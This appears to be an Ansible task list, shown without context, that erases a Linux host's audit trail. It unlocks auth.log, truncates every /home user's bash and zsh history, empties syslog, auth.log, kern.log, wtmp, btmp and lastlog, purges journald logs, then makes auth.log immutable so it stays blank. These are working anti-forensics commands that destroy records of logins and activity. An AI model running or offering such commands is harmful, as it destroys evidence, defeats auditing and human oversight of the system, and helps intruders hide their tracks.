---
- name: Unset immutable attribute
  command: "chattr -i /var/log/auth.log"

- name: Get all passwd entries
  ansible.builtin.getent:
    database: passwd

- name: Filter users with home directories in /home
  set_fact:
    home_users: >-
      {{
        getent_passwd | dict2items 
        | selectattr('value.4', 'match', '^/home') 
        | list
      }}

- name: Clear shell history for all users
  ansible.builtin.shell: |
    truncate -s 0 {{ item.value.4 }}/.bash_history
    truncate -s 0 {{ item.value.4 }}/.zsh_history
  loop: "{{ home_users }}"
  failed_when: false

- name: Truncate system logs
  ansible.builtin.shell: |
    truncate -s 0 /var/log/syslog
    truncate -s 0 /var/log/auth.log
    truncate -s 0 /var/log/kern.log
    truncate -s 0 /var/log/wtmp
    truncate -s 0 /var/log/btmp
    truncate -s 0 /var/log/lastlog
  changed_when: true

- name: Clear journald logs
  ansible.builtin.command: journalctl --vacuum-time=1s
  changed_when: true

- name: Set immutable attribute
  command: "chattr +i /var/log/auth.log"